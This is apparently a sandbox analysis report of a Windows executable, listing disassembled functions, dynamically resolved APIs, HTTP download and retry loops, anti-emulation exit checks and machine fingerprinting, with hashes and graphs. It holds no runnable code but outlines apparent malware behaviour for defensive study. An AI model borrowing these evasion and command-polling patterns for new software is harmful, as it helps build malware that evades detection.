                        • LoadLibraryA.KERNEL32(0196D9C8,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A0A7
                        • LoadLibraryA.KERNEL32(0196DC20,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A0B8
                        • GetProcAddress.KERNEL32(751E0000,01956398), ref: 00E3A0DA
                        • GetProcAddress.KERNEL32(751E0000,0196DD28), ref: 00E3A0F2
                        • GetProcAddress.KERNEL32(751E0000,01968A70), ref: 00E3A10A
                        • GetProcAddress.KERNEL32(751E0000,0196DC38), ref: 00E3A123
                        • GetProcAddress.KERNEL32(751E0000,01956178), ref: 00E3A13B
                        • GetProcAddress.KERNEL32(70150000,0195A880), ref: 00E3A160
                        • GetProcAddress.KERNEL32(70150000,01956298), ref: 00E3A179
                        • GetProcAddress.KERNEL32(70150000,0195A7E0), ref: 00E3A191
                        • GetProcAddress.KERNEL32(70150000,0196DD40), ref: 00E3A1A9
                        • GetProcAddress.KERNEL32(70150000,0196DC50), ref: 00E3A1C2
                        • GetProcAddress.KERNEL32(70150000,01956318), ref: 00E3A1DA
                        • GetProcAddress.KERNEL32(70150000,01956138), ref: 00E3A1F2
                        • GetProcAddress.KERNEL32(70150000,0196DC68), ref: 00E3A20B
                        • GetProcAddress.KERNEL32(753A0000,01956038), ref: 00E3A22C
                        • GetProcAddress.KERNEL32(753A0000,01956278), ref: 00E3A244
                        • GetProcAddress.KERNEL32(753A0000,0196DD88), ref: 00E3A25D
                        • GetProcAddress.KERNEL32(753A0000,0196DC80), ref: 00E3A275
                        • GetProcAddress.KERNEL32(753A0000,01956098), ref: 00E3A28D
                        • GetProcAddress.KERNEL32(76310000,0195A650), ref: 00E3A2B3
                        • GetProcAddress.KERNEL32(76310000,0195A498), ref: 00E3A2CB
                        • GetProcAddress.KERNEL32(76310000,0196DCB0), ref: 00E3A2E3
                        • GetProcAddress.KERNEL32(76310000,019560D8), ref: 00E3A2FC
                        • GetProcAddress.KERNEL32(76310000,019560B8), ref: 00E3A314
                        • GetProcAddress.KERNEL32(76310000,0195A808), ref: 00E3A32C
                        • GetProcAddress.KERNEL32(76910000,0196DC98), ref: 00E3A352
                        • GetProcAddress.KERNEL32(76910000,01956078), ref: 00E3A36A
                        • GetProcAddress.KERNEL32(76910000,01968920), ref: 00E3A382
                        • GetProcAddress.KERNEL32(76910000,0196DCC8), ref: 00E3A39B
                        • GetProcAddress.KERNEL32(76910000,0196DCE0), ref: 00E3A3B3
                        • GetProcAddress.KERNEL32(76910000,019560F8), ref: 00E3A3CB
                        • GetProcAddress.KERNEL32(76910000,01956118), ref: 00E3A3E4
                        • GetProcAddress.KERNEL32(76910000,0196DCF8), ref: 00E3A3FC
                        • GetProcAddress.KERNEL32(76910000,0196DC08), ref: 00E3A414
                        • GetProcAddress.KERNEL32(75B30000,019563B8), ref: 00E3A436
                        • GetProcAddress.KERNEL32(75B30000,0196DD10), ref: 00E3A44E
                        • GetProcAddress.KERNEL32(75B30000,0196DE00), ref: 00E3A466
                        • GetProcAddress.KERNEL32(75B30000,0196DB48), ref: 00E3A47F
                        • GetProcAddress.KERNEL32(75B30000,0196DD58), ref: 00E3A497
                        • GetProcAddress.KERNEL32(75670000,01956058), ref: 00E3A4B8
                        • GetProcAddress.KERNEL32(75670000,01956158), ref: 00E3A4D1
                        • GetProcAddress.KERNEL32(76AC0000,01956198), ref: 00E3A4F2
                        • GetProcAddress.KERNEL32(76AC0000,0196DD70), ref: 00E3A50A
                        • GetProcAddress.KERNEL32(6F4E0000,019561D8), ref: 00E3A530
                        • GetProcAddress.KERNEL32(6F4E0000,01956338), ref: 00E3A548
                        • GetProcAddress.KERNEL32(6F4E0000,019561B8), ref: 00E3A560
                        • GetProcAddress.KERNEL32(6F4E0000,0196DDA0), ref: 00E3A579
                        • GetProcAddress.KERNEL32(6F4E0000,019561F8), ref: 00E3A591
                        • GetProcAddress.KERNEL32(6F4E0000,01956218), ref: 00E3A5A9
                        • GetProcAddress.KERNEL32(6F4E0000,019563D8), ref: 00E3A5C2
                        • GetProcAddress.KERNEL32(6F4E0000,01956238), ref: 00E3A5DA
                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00E3A5F1
                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00E3A607
                        • GetProcAddress.KERNEL32(75AE0000,0196DDD0), ref: 00E3A629
                        • GetProcAddress.KERNEL32(75AE0000,01968A30), ref: 00E3A641
                        • GetProcAddress.KERNEL32(75AE0000,0196DDB8), ref: 00E3A659
                        • GetProcAddress.KERNEL32(75AE0000,0196DDE8), ref: 00E3A672
                        • GetProcAddress.KERNEL32(76300000,01956258), ref: 00E3A693
                        • GetProcAddress.KERNEL32(6FE40000,0196DE18), ref: 00E3A6B4
                        • GetProcAddress.KERNEL32(6FE40000,01956358), ref: 00E3A6CD
                        • GetProcAddress.KERNEL32(6FE40000,0196DBD8), ref: 00E3A6E5
                        • GetProcAddress.KERNEL32(6FE40000,0196DBC0), ref: 00E3A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 17793d3e58240baef2d3e22780a7f3f9a337cc2fe608ee6b82c5e050ea89afb3
                        • Instruction ID: e5b0bc6e88fba4fa56d108a55f7ae03b1be7b4dbe7c7557116c5047b2e095dec
                        • Opcode Fuzzy Hash: 17793d3e58240baef2d3e22780a7f3f9a337cc2fe608ee6b82c5e050ea89afb3
                        • Instruction Fuzzy Hash: A3620CB5700200EFC764FFA8EA8895637F9F78C601714855AE686E326CD73FA841DB60
                        Function 00E26280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 e26280-e2630b call e3a7a0 call e247b0 call e3a740 InternetOpenA StrCmpCA 1040 e26314-e26318 1033->1040 1041 e2630d 1033->1041 1042 e26509-e26525 call e3a7a0 call e3a800 * 2 1040->1042 1043 e2631e-e26342 InternetConnectA 1040->1043 1041->1040 1063 e26528-e2652d 1042->1063 1044 e26348-e2634c 1043->1044 1045 e264ff-e26503 InternetCloseHandle 1043->1045 1047 e2635a 1044->1047 1048 e2634e-e26358 1044->1048 1045->1042 1050 e26364-e26392 HttpOpenRequestA 1047->1050 1048->1050 1052 e264f5-e264f9 InternetCloseHandle 1050->1052 1053 e26398-e2639c 1050->1053 1052->1045 1055 e263c5-e26405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 e2639e-e263bf InternetSetOptionA 1053->1056 1058 e26407-e26427 call e3a740 call e3a800 * 2 1055->1058 1059 e2642c-e2644b call e38940 1055->1059 1056->1055 1058->1063 1066 e264c9-e264e9 call e3a740 call e3a800 * 2 1059->1066 1067 e2644d-e26454 1059->1067 1066->1063 1069 e26456-e26480 InternetReadFile 1067->1069 1070 e264c7-e264ef InternetCloseHandle 1067->1070 1074 e26482-e26489 1069->1074 1075 e2648b 1069->1075 1070->1052 1074->1075 1079 e2648d-e264c5 call e3a9b0 call e3a8a0 call e3a800 1074->1079 1075->1070 1079->1069
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E263FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E2646D
                        • InternetCloseHandle.WININET(00000000), ref: 00E264EF
                        • InternetCloseHandle.WININET(00000000), ref: 00E264F9
                        • InternetCloseHandle.WININET(00000000), ref: 00E26503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: ecbd0319188409875a31773d53227288dfc9687a1d8bca8de060c5b486c844fd
                        • Instruction ID: 6518d6c2a08f8970d6797b38df34f07a46b3defb6f081671a90cab66b3f0c248
                        • Opcode Fuzzy Hash: ecbd0319188409875a31773d53227288dfc9687a1d8bca8de060c5b486c844fd
                        • Instruction Fuzzy Hash: 82715E71A00218EBDB24EFA0DC49FEE77B8BB44700F1091A9F14A7B194DBB56A85CF51
                        Function 00E35510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 e35510-e35577 call e35ad0 call e3a820 * 3 call e3a740 * 4 1106 e3557c-e35583 1090->1106 1107 e355d7-e3564c call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1106->1107 1108 e35585-e355b6 call e3a820 call e3a7a0 call e21590 call e351f0 1106->1108 1133 e35693-e356a9 call e3aad0 StrCmpCA 1107->1133 1137 e3564e-e3568e call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1107->1137 1124 e355bb-e355d2 call e3a8a0 call e3a800 1108->1124 1124->1133 1140 e356af-e356b6 1133->1140 1141 e357dc-e35844 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1133->1141 1137->1133 1144 e357da-e3585f call e3aad0 StrCmpCA 1140->1144 1145 e356bc-e356c3 1140->1145 1270 e35ac3-e35ac6 1141->1270 1164 e35991-e359f9 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1144->1164 1165 e35865-e3586c 1144->1165 1149 e356c5-e35719 call e3a820 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1145->1149 1150 e3571e-e35793 call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 e35795-e357d5 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1150->1250 1164->1270 1172 e35872-e35879 1165->1172 1173 e3598f-e35a14 call e3aad0 StrCmpCA 1165->1173 1174 e358d3-e35948 call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1172->1174 1175 e3587b-e358ce call e3a820 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1172->1175 1203 e35a16-e35a21 Sleep 1173->1203 1204 e35a28-e35a91 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1173->1204 1174->1173 1275 e3594a-e3598a call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1174->1275 1175->1173 1203->1106 1204->1270 1250->1144 1275->1173
                        APIs
                          • Part of subcall function 00E3A820: lstrlen.KERNEL32(00E24F05,?,?,00E24F05,00E40DDE), ref: 00E3A82B
                          • Part of subcall function 00E3A820: lstrcpy.KERNEL32(00E40DDE,00000000), ref: 00E3A885
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E356A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35857
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35228
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35318
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E3532F
                          • Part of subcall function 00E352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E35364
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E35383
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E353AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E3578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00E35A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 9fde37c438289dc8a6b5bd4d31f8343f24978bf7802f228af619a214e2b03acb
                        • Instruction ID: f8921478af1e15c0c00597649b679dcdc4ac9b12a108fc5325fe2bbe1d6c9810
                        • Opcode Fuzzy Hash: 9fde37c438289dc8a6b5bd4d31f8343f24978bf7802f228af619a214e2b03acb
                        • Instruction Fuzzy Hash: E5E15372910104AACB18FBB0EC9EAED7BB8AF54300F449178F44677195EF356B49CB92
                        Function 00E317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 e317a0-e317cd call e3aad0 StrCmpCA 1304 e317d7-e317f1 call e3aad0 1301->1304 1305 e317cf-e317d1 ExitProcess 1301->1305 1309 e317f4-e317f8 1304->1309 1310 e319c2-e319cd call e3a800 1309->1310 1311 e317fe-e31811 1309->1311 1313 e31817-e3181a 1311->1313 1314 e3199e-e319bd 1311->1314 1316 e31821-e31830 call e3a820 1313->1316 1317 e31849-e31858 call e3a820 1313->1317 1318 e318cf-e318e0 StrCmpCA 1313->1318 1319 e3198f-e31999 call e3a820 1313->1319 1320 e318ad-e318be StrCmpCA 1313->1320 1321 e31913-e31924 StrCmpCA 1313->1321 1322 e31932-e31943 StrCmpCA 1313->1322 1323 e318f1-e31902 StrCmpCA 1313->1323 1324 e31951-e31962 StrCmpCA 1313->1324 1325 e31970-e31981 StrCmpCA 1313->1325 1326 e31835-e31844 call e3a820 1313->1326 1327 e3187f-e31890 StrCmpCA 1313->1327 1328 e3185d-e3186e StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1342 e318e2-e318e5 1318->1342 1343 e318ec 1318->1343 1319->1314 1340 e318c0-e318c3 1320->1340 1341 e318ca 1320->1341 1346 e31930 1321->1346 1347 e31926-e31929 1321->1347 1348 e31945-e31948 1322->1348 1349 e3194f 1322->1349 1344 e31904-e31907 1323->1344 1345 e3190e 1323->1345 1350 e31964-e31967 1324->1350 1351 e3196e 1324->1351 1330 e31983-e31986 1325->1330 1331 e3198d 1325->1331 1326->1314 1338 e31892-e3189c 1327->1338 1339 e3189e-e318a1 1327->1339 1336 e31870-e31873 1328->1336 1337 e3187a 1328->1337 1330->1331 1331->1314 1336->1337 1337->1314 1355 e318a8 1338->1355 1339->1355 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1314 1347->1346 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00E317C5
                        • ExitProcess.KERNEL32 ref: 00E317D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: dfefdae90e9f1dfdeaee967dc3d31f0b80d36a7ac1cc1f4defd61e246b179529
                        • Instruction ID: a886701c6fe0b39634e678960dc738cea91a2efd0582a778def6201d22faf79f
                        • Opcode Fuzzy Hash: dfefdae90e9f1dfdeaee967dc3d31f0b80d36a7ac1cc1f4defd61e246b179529
                        • Instruction Fuzzy Hash: 505169B4A04209EFCB04DFA4D958BBE7BB5BF88304F10A09CE946B7240D775E955CB61
                        Function 00E37500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 e37500-e3754a GetWindowsDirectoryA 1357 e37553-e375c7 GetVolumeInformationA call e38d00 * 3 1356->1357 1358 e3754c 1356->1358 1365 e375d8-e375df 1357->1365 1358->1357 1366 e375e1-e375fa call e38d00 1365->1366 1367 e375fc-e37617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e37619-e37626 call e3a740 1367->1369 1370 e37628-e37658 wsprintfA call e3a740 1367->1370 1377 e3767e-e3768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E37542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E3757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E3760A
                        • wsprintfA.USER32 ref: 00E37640
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$
                        • API String ID: 1544550907-3109660283
                        • Opcode ID: c5d97c22a38989401972494ebe30a944645ac99cce6f7a42e110096182916bb3
                        • Instruction ID: c1597eaff42d71f7d0f7d5276a94019f165531c459577eca2e126444deafea0e
                        • Opcode Fuzzy Hash: c5d97c22a38989401972494ebe30a944645ac99cce6f7a42e110096182916bb3
                        • Instruction Fuzzy Hash: 6B4192F1E04248EBDB20DF94DC49BDEBBB8AF48704F100199F54977280D7796A44CBA5
                        Function 00E369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961748), ref: 00E398A1
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961568), ref: 00E398BA
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615C8), ref: 00E398D2
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615E0), ref: 00E398EA
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961538), ref: 00E39903
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019689F0), ref: 00E3991B
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956718), ref: 00E39933
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956498), ref: 00E3994C
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615F8), ref: 00E39964
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019616D0), ref: 00E3997C
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615B0), ref: 00E39995
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961760), ref: 00E399AD
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956678), ref: 00E399C5
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019617A8), ref: 00E399DE
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E211D0: ExitProcess.KERNEL32 ref: 00E21211
                          • Part of subcall function 00E21160: GetSystemInfo.KERNEL32(?), ref: 00E2116A
                          • Part of subcall function 00E21160: ExitProcess.KERNEL32 ref: 00E2117E
                          • Part of subcall function 00E21110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E2112B
                          • Part of subcall function 00E21110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E21132
                          • Part of subcall function 00E21110: ExitProcess.KERNEL32 ref: 00E21143
                          • Part of subcall function 00E21220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E2123E
                          • Part of subcall function 00E21220: __aulldiv.LIBCMT ref: 00E21258
                          • Part of subcall function 00E21220: __aulldiv.LIBCMT ref: 00E21266
                          • Part of subcall function 00E21220: ExitProcess.KERNEL32 ref: 00E21294
